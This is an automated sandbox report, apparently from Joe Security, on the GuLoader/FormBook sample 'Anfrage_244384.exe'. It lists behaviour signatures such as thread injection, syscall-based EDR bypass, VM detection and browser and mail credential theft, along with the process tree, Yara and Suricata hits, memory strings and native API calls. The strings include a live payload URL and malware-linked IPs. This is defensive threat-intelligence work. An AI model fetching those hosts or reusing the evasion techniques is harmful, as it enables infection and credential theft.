Edit tour

Windows Analysis Report
Anfrage_244384.exe

Overview

General Information

Sample name:	Anfrage_244384.exe
Analysis ID:	1550253
MD5:	b03f23199ae987a7bce0ff1a0d742e3e
SHA1:	f454c8de72926ee9f98db7056fa89f0c3ada9666
SHA256:	eda014e3b658bfbbfd141c1459a3414d9ee8b7c139a3976fe732141fa9cf3f80
Tags:	exeuser-threatcat_ch
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected FormBook

Yara detected GuLoader

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

PE / OLE file has an invalid certificate

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Anfrage_244384.exe (PID: 5308 cmdline: "C:\Users\user\Desktop\Anfrage_244384.exe" MD5: B03F23199AE987A7BCE0FF1A0D742E3E)

Anfrage_244384.exe (PID: 5608 cmdline: "C:\Users\user\Desktop\Anfrage_244384.exe" MD5: B03F23199AE987A7BCE0FF1A0D742E3E)

dptLotHBnXg.exe (PID: 3052 cmdline: "C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

verclsid.exe (PID: 1056 cmdline: "C:\Windows\SysWOW64\verclsid.exe" MD5: 190A347DF06F8486F193ADA0E90B49C5)

dptLotHBnXg.exe (PID: 3916 cmdline: "C:\Program Files (x86)\tAKCTYeJpmZahMqbkmAXToQDqRYfFQfhdsmegOOXsToYOGIuLlVOIVfQTf\dptLotHBnXg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 1832 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2597198603.0000000004A03000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Click to see the 3 entries

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-06T16:10:51.193850+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.6	49753	TCP
2024-11-06T16:11:29.888003+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.6	49926	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-06T16:11:29.973578+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	49927	188.40.95.144	443	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 15:12:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 65 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 76 61 72 75 73 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 8

Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: http://crl.apple.com/root.crl0
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: Anfrage_244384.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Anfrage_244384.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: http://www.apple.com/appleca0
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp, Anfrage_244384.exe, 00000004.00000002.3092816967.00000000046B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bin
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bin2
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.binA
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bink
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.0000000004378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.binl
Source: Anfrage_244384.exe, 00000004.00000002.3092148007.00000000043B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://familytherapycenter.rs/LxuQG254.bins
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
Source: Anfrage_244384.exe, 00000004.00000001.2596303421.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: verclsid.exe, 00000007.00000002.3361368137.000000000083A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20M
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: verclsid.exe, 00000007.00000003.3288064546.00000000076CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10334
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: verclsid.exe, 00000007.00000002.3361368137.0000000000816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru
Source: verclsid.exe, 00000007.00000002.3363414248.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3362682978.0000000004300000.00000004.00000020.00020000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000000.3174698379.00000000026AC000.00000004.00000001.00040000.00000000.sdmp, Anfrage_244384.exe	String found in binary or memory: https://www.apple.com/appleca/0
Source: verclsid.exe, 00000007.00000002.3365232559.00000000076E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_se
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_n
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_host
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/sozdanie-saita/
Source: verclsid.exe, 00000007.00000002.3363414248.0000000005024000.00000004.10000000.00040000.00000000.sdmp, dptLotHBnXg.exe, 00000008.00000002.3362833809.0000000002A94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.svarus.online&reg_source=parking_auto

Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927

Source: unknown

HTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.6:49927 version: TLS 1.2

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Code function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040511A

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000007.00000002.3362363415.0000000000960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3361086022.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3362535904.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3361838593.00000000007B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3122242151.0000000034330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3123079037.0000000035D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3362392086.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Anfrage_244384.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B35C0 NtCreateMutant,LdrInitializeThunk,	4_2_346B35C0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_346B2C70
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_346B2DF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3010 NtOpenDirectoryObject,	4_2_346B3010
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3090 NtSetValueKey,	4_2_346B3090
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3D70 NtOpenThread,	4_2_346B3D70
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B3D10 NtOpenProcessToken,	4_2_346B3D10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B39B0 NtGetContextThread,	4_2_346B39B0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B4650 NtSuspendThread,	4_2_346B4650
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B4340 NtSetContextThread,	4_2_346B4340
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2C60 NtCreateKey,	4_2_346B2C60
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2C00 NtQueryInformationProcess,	4_2_346B2C00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2CF0 NtOpenProcess,	4_2_346B2CF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2CC0 NtQueryVirtualMemory,	4_2_346B2CC0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2CA0 NtQueryInformationToken,	4_2_346B2CA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2D30 NtUnmapViewOfSection,	4_2_346B2D30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2D00 NtSetInformationFile,	4_2_346B2D00
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2D10 NtMapViewOfSection,	4_2_346B2D10
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2DD0 NtDelayExecution,	4_2_346B2DD0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2DB0 NtEnumerateKey,	4_2_346B2DB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2E30 NtWriteVirtualMemory,	4_2_346B2E30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2EE0 NtQueueApcThread,	4_2_346B2EE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2EA0 NtAdjustPrivilegesToken,	4_2_346B2EA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2E80 NtReadVirtualMemory,	4_2_346B2E80
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2F60 NtCreateProcessEx,	4_2_346B2F60
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2F30 NtCreateSection,	4_2_346B2F30
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2FE0 NtCreateFile,	4_2_346B2FE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2FA0 NtQuerySection,	4_2_346B2FA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2FB0 NtResumeThread,	4_2_346B2FB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2F90 NtProtectVirtualMemory,	4_2_346B2F90
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2AF0 NtWriteFile,	4_2_346B2AF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2AD0 NtReadFile,	4_2_346B2AD0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2AB0 NtWaitForSingleObject,	4_2_346B2AB0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2B60 NtClose,	4_2_346B2B60
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2BE0 NtQueryValueKey,	4_2_346B2BE0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2BF0 NtAllocateVirtualMemory,	4_2_346B2BF0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2BA0 NtEnumerateValueKey,	4_2_346B2BA0
Source: C:\Users\user\Desktop\Anfrage_244384.exe	Code function: 4_2_346B2B80 NtQueryInformationFile,	4_2_346B2B80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D4650 NtSuspendThread,LdrInitializeThunk,	7_2_045D4650
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D4340 NtSetContextThread,LdrInitializeThunk,	7_2_045D4340
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_045D2C70
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2C60 NtCreateKey,LdrInitializeThunk,	7_2_045D2C60
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_045D2CA0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_045D2D10
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_045D2D30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2DD0 NtDelayExecution,LdrInitializeThunk,	7_2_045D2DD0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_045D2DF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_045D2EE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_045D2E80
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2F30 NtCreateSection,LdrInitializeThunk,	7_2_045D2F30
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2FE0 NtCreateFile,LdrInitializeThunk,	7_2_045D2FE0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2FB0 NtResumeThread,LdrInitializeThunk,	7_2_045D2FB0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2AD0 NtReadFile,LdrInitializeThunk,	7_2_045D2AD0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2AF0 NtWriteFile,LdrInitializeThunk,	7_2_045D2AF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 7_2_045D2B60 NtClose,LdrInitializeThunk,	7_2_045D2B60
